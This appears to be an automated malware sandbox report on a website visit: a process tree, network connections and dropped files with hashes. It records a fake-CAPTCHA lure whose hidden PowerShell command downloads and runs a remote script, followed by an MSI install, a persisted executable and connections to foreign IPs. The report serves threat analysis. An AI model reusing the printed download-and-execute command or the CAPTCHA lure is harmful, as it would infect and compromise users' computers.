PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4312 wrote to memory of 920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://cac-ltd.ca/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffb09046f8,0x7fffb0904708,0x7fffb0904718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c start /min powershell -NoProfile -WindowStyle Hidden "iwr 'https://serviceverifcaptcho.com/tos2.js' | iex" # I am not a robot: Cloudflare Verification ID: 5FZ-41P

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -WindowStyle Hidden "iwr 'https://serviceverifcaptcho.com/tos2.js' | iex" # I am not a robot: Cloudflare Verification ID: 5FZ-41P

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

cmd /c start /min powershell -NoProfile -WindowStyle Hidden "iwr 'https://serviceverifcaptcho.com/tos2.js' | iex" # I am not a robot: Cloudflare Verification ID: 5FZ-41P

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -WindowStyle Hidden "iwr 'https://serviceverifcaptcho.com/tos2.js' | iex" # I am not a robot: Cloudflare Verification ID: 5FZ-41P

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\8ab.msi"

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\8ab.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 6B0897BF9B0BFC5C33497F7960BD05E6 C

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{883FDC82-2DAD-4A12-A0E8-55236ACAF576}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{C70D3561-E6A6-4677-9B03-AFA7DD5FD740}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{09951C22-2C83-46B1-BC58-251BDE1F87F4}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{5107D142-0AF4-4E89-AFDE-1979AB02F34D}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{01D187BB-1674-403E-B802-BF4BA547F128}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{2999517C-2F1F-440E-923A-3DF1DFAB1AFB}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4DECE0DB-7710-482E-AEB7-05E45C12AA3A}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{2F8A9065-6B6E-4D8E-AC74-2B626783A691}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{6CD903AB-76A2-4553-A3C5-F3CDE8BF0D05}

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{787E3687-F2C3-46AA-BB32-3CCD4CB168D3}

C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe

C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe

C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe

C:\Users\Admin\AppData\Roaming\serviceBackup\crashreporter.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,2531446605574779877,12538923450799841883,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 cac-ltd.ca udp
US 208.109.23.179:80 cac-ltd.ca tcp
US 208.109.23.179:80 cac-ltd.ca tcp
US 8.8.8.8:53 www.cac-ltd.ca udp
US 208.109.23.179:443 www.cac-ltd.ca tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 tripallmaljok.com udp
US 8.8.8.8:53 s.w.org udp
TN 91.92.46.97:443 tripallmaljok.com tcp
US 8.8.8.8:53 kalkgmbzfghq.com udp
US 104.21.48.122:443 kalkgmbzfghq.com tcp
N/A 224.0.0.251:5353 udp
US 192.0.77.48:443 s.w.org tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 serviceverifcaptcho.com udp
US 104.21.79.96:443 serviceverifcaptcho.com tcp
US 8.8.8.8:53 tripallmaljok.com udp
TN 91.92.46.97:443 tripallmaljok.com tcp
US 8.8.8.8:53 kalkgmbzfghq.com udp
US 172.67.151.59:443 kalkgmbzfghq.com tcp
US 104.21.79.96:443 serviceverifcaptcho.com tcp
GB 95.100.153.187:443 www.bing.com tcp
RU 92.255.85.23:15847 tcp
RU 92.255.85.23:9000 92.255.85.23 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 94bd9c36e88be77b106069e32ac8d934
SHA1 32bd157b84cde4eaf93360112d707056fc5b0b86
SHA256 8f49a43a08e2984636b172a777d5b3880e6e82ad25b427fef3f05b7b4f5c5b27
SHA512 7d4933fae6a279cc330fde4ae9425f66478c166684a30cec9c5c3f295289cf83cbdf604b8958f6db64b0a4b1566db102fbcbdcdb6eca008d86d9a9c8b252ff16

\??\pipe\LOCAL\crashpad_4312_UNXODKIDPWIBCYCY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 25f87986bcd72dd045d9b8618fb48592
SHA1 c2d9b4ec955b8840027ff6fd6c1f636578fef7b5
SHA256 d8b542281740c12609279f2549f85d3c94e6e49a3a2a4b9698c93cca2dce486c
SHA512 0c8a0d1a3b0d4b30773b8519a3d6e63d92973733da818ca9838599a9639e18df18ce31ebf56f46f6bbb7d89d10c726f4d73781e154d115a6068a3be7dd12b314

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 88cc2890127161630f6a3e56d6457a04
SHA1 909870a3de3bbd4f45d5febcff526e136170538f
SHA256 947906cbb6455400a0b1e6d6d7a0f5604fa9cc17c2cb53a677f2fdbd5ded75e7
SHA512 3d27884859b86f31cab615cb879b0529c86a6dd2a8fae65bcb87520b39dd8b3c3a2d3208d45260c726ede0f8598fc3301b600efb4a785370bc896f73b7f60974

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6dbdc92bf2fcba4dae94a47b04861aa4
SHA1 4d6eb6af6c19549ad6c2f75d332162c2f775f536
SHA256 7375f39ef661759aee3282dd2b870ff1b9bd6e61cb6dece9c2224b431b84ff5a
SHA512 0e5bdb76444c4e9e4e331c44f3677912fb8c1058ef6143fc1f66124b01961b6f0eb14918ef8ce57dd5233f2d827f5733e9e6a87ed064df8a85f0a258c17e615b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e431a7fe9cac45a8259376b0d7b26bde
SHA1 aaff6718f702261cbd97c0d83d1db2dd293ab383
SHA256 1810231355b4185eb940a3e4a648c535a22b8c5079b06e1c20e944b6c16465ea
SHA512 78b47bdc79333ab3483ed309854d449315c2c019f9ea7d7e9e85dd5270873f986c1e6a281d2e22ec80e0c9b1fc929706eaf2e3707652f4536155438d1ff90315

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d0ef298f7d2df110952176bf7993606d
SHA1 4fc2ace3a90c3d850431d78de635886a111f164f
SHA256 c6664857ed5253860f57ba1e4a47192e002fed3746ed960c170f0cb182369653
SHA512 f1dbd8cd7b86daa126bcf299d394252771485c8d2b2cecbea69b42bd01c0407696a1752ab4025c9be0827de162c89a0af7c15fc9f3220ac3120e59d5ed3977f6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 05ba6d12dd7b67750f0ec1b01b797b2d
SHA1 92a68d179f2e4f85e0bfe49ffd21e74991277a36
SHA256 2d79f64579bd47a68e04bb90aa84bc0bfdc44d8312e891b37fdcab2dd054c086
SHA512 73c58c28ce0dd4915ede2da232c2ec9523088ca17516eaf980028ee9b63157e6532ff56386b53bba97a51a02ad1d46b1e1fc2cbb1fa7379ab1b931f4ec61ba95

memory/5908-159-0x0000020203070000-0x0000020203092000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rm5r5edj.nxu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5908-169-0x000002021BF90000-0x000002021C736000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 92602395a8d5976d7abf29d3a9920626
SHA1 cf56b0fcaad2d55cba91b6d44dbea18285b8df90
SHA256 410d6675face474a0ab5a02f8234f7da1595b5b136fc8e96af737e9f7b8c512c
SHA512 5ee10342de687d4f2f05ecbcc391bd62fbb929399048d1694386643e366450992e99251318c195a600ee6db6bd9e03f0e43f79d14de3dfbc160fdd03d37fb48c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7258f8cf65d6214a685b154d175ab986
SHA1 aba90da7ce64b809675d500ba399972bea800b63
SHA256 2b69c7543d71aefd5a9fb8a60c71b7ddbd6bcedc4b7ae3a251882f273c9e4f5a
SHA512 ab170aae42dee741a1145120e5bc6868e78d51f63624197859a500d120e3f0e8ae5da85199837f28e8f0101c2144856d621ea00a26d8e9964e610168262f11a5

C:\Users\Admin\AppData\Local\Temp\8ab.msi

MD5 8c7dbd9c66e7e1fe157eefdc9c307327
SHA1 308c89e3c56daacb9eda883494ace8c68c5ccdbd
SHA256 2e01a4be7cf7bfb874988ecf56d1aca5ca0da8bcbc270076cbea6682241763a0
SHA512 644005fc45a31fb8115d5febc2f57d069e10ee820c393338dffa3bc09a2c158565c7ee93d6ec12a1c420ba6a731b2965778f7c68823415591fff71e36fefa42f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e18e685e828b286231c755f82768f3c3
SHA1 f900c6e45c9ffcfc844be0552c816bc936b70567
SHA256 b890499abc13afc3c8a0537352d704c0b6f14f2ea3c8b928b2ab28951a343395
SHA512 5bf7aa19de82c3e7d8fb4117cfba65c0a441f0720db9e3875d626976e7092202e537ce37a003051b69800f785a83859dfb8661c6945c526f2644452b8f76b074

C:\Users\Admin\AppData\Local\Temp\8ab.msi

MD5 f648d8ad0c51e0c687497977013f95bf
SHA1 b1d59b7e513f078fd1494aca6ede7de9cc055b75
SHA256 fe8f15af11083e5dd800be34d9a1d03700b26563e29d580e713a81e74658234f
SHA512 f72213c5488db023148cb8c9ceaaea8a4450ceecf5e28a909d765a0691891af5176b08bcc6371c39ce5a53df55c4c673d650eef981a8e82f8b3a4fcc84daa690

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d452b5232a87126b41f0438f9e73043f
SHA1 f2c9497e4b05365fdf112005b5af98546e7ffc58
SHA256 56fb5a1f5804b1c56f879fd64da0db43eadce02e8e3b25af1bbfaa8629c70836
SHA512 a7a58be5689a67b4d906a8f0a462586855b7a466ecd6e32bb31e042a841c67b4ac3ba374879b2cabf9435140c3043417490385ae6670e1cfaecacfcb850af945

C:\Users\Admin\AppData\Local\Temp\MSIE450.tmp

MD5 a0e940a3d3c1523416675125e3b0c07e
SHA1 2e29eeba6da9a4023bc8071158feee3b0277fd1b
SHA256 b8fa7aa425e4084ea3721780a13d11e08b8d53d1c5414b73f22faeca1bfd314f
SHA512 736ea06824388372aeef1938c6b11e66f4595e0b0589d7b4a87ff4abbabe52e82dff64d916293eab47aa869cf372ced2c66755dd8a8471b2ab0d3a37ba91d0b2

C:\Users\Admin\AppData\Local\Temp\MSIE77E.tmp

MD5 972be7fb4870e087d377711120db74ef
SHA1 376baac02578055bff38a720262a4ef43d654bc1
SHA256 f5413696231260e8fab2a667c2f59dd21928ad360df11b0e45f695402932741d
SHA512 82a63616c440dbb5c420d6058fd7ef91b3d1438a8425a21fede47adb2b7bc4f21ca36bee32fb855a1ff9d53426aa60ccbd2ec208b9bb7dfe226248ca5bf57d88

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISBEW64.exe

MD5 40f3a092744e46f3531a40b917cca81e
SHA1 c73f62a44cb3a75933cecf1be73a48d0d623039b
SHA256 561f14cdece85b38617403e1c525ff0b1b752303797894607a4615d0bd66f97f
SHA512 1589b27db29051c772e5ba56953d9f798efbf74d75e0524fa8569df092d28960972779811a7916198d0707d35b1093d3e0dd7669a8179c412cfa7df7120733b2

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\ISRT.dll

MD5 8af02bf8e358e11caec4f2e7884b43cc
SHA1 16badc6c610eeb08de121ab268093dd36b56bf27
SHA256 58a724d23c63387a2dda27ccfdbc8ca87fd4db671bea8bb636247667f6a5a11e
SHA512 d0228a8cc93ff6647c2f4ba645fa224dc9d114e2adb5b5d01670b6dafc2258b5b1be11629868748e77b346e291974325e8e8e1192042d7c04a35fc727ad4e3fd

memory/3372-296-0x0000000010000000-0x0000000010114000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{E98F9309-CEE8-48B1-9AEB-D45833653EB8}\_isres_0x0409.dll

MD5 7de024bc275f9cdeaf66a865e6fd8e58
SHA1 5086e4a26f9b80699ea8d9f2a33cead28a1819c0
SHA256 bd32468ee7e8885323f22eabbff9763a0f6ffef3cc151e0bd0481df5888f4152
SHA512 191c57e22ea13d13806dd390c4039029d40c7532918618d185d8a627aabc3969c7af2e532e3c933bde8f652b4723d951bf712e9ba0cc0d172dde693012f5ef1a

memory/3372-301-0x0000000002CA0000-0x0000000002E67000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\crashreporter.exe

MD5 e69917fa99f750a6c4e19523c3f2014b
SHA1 4b0185f38b668d7332d411f4824de2d111b3e670
SHA256 51de0b104e9ced3028a41d01dedf735809eb7f60888621027c7f00f0fcf9c834
SHA512 2f3b3f878fcae51a718d5ae2c12b4d98372c7aab46ed93cd567e66a1b45a96fb79ad66b7aaf0e9383905f46e4f639597af4914640d23596583057112d94a22c4

C:\Users\Admin\AppData\Local\Temp\{7F2CC590-1D6D-49CF-B4E6-F2CAEDC92721}\vcruntime140.dll

MD5 e4ed441f0f6afb0d8d55af87900ec48f
SHA1 ac5bd77fd06ed29bebceb65371387555658870d9
SHA256 09d1e604e8cdd06176fcc3d3698861be20638a4391f9f2d9e23f868c1576ca94
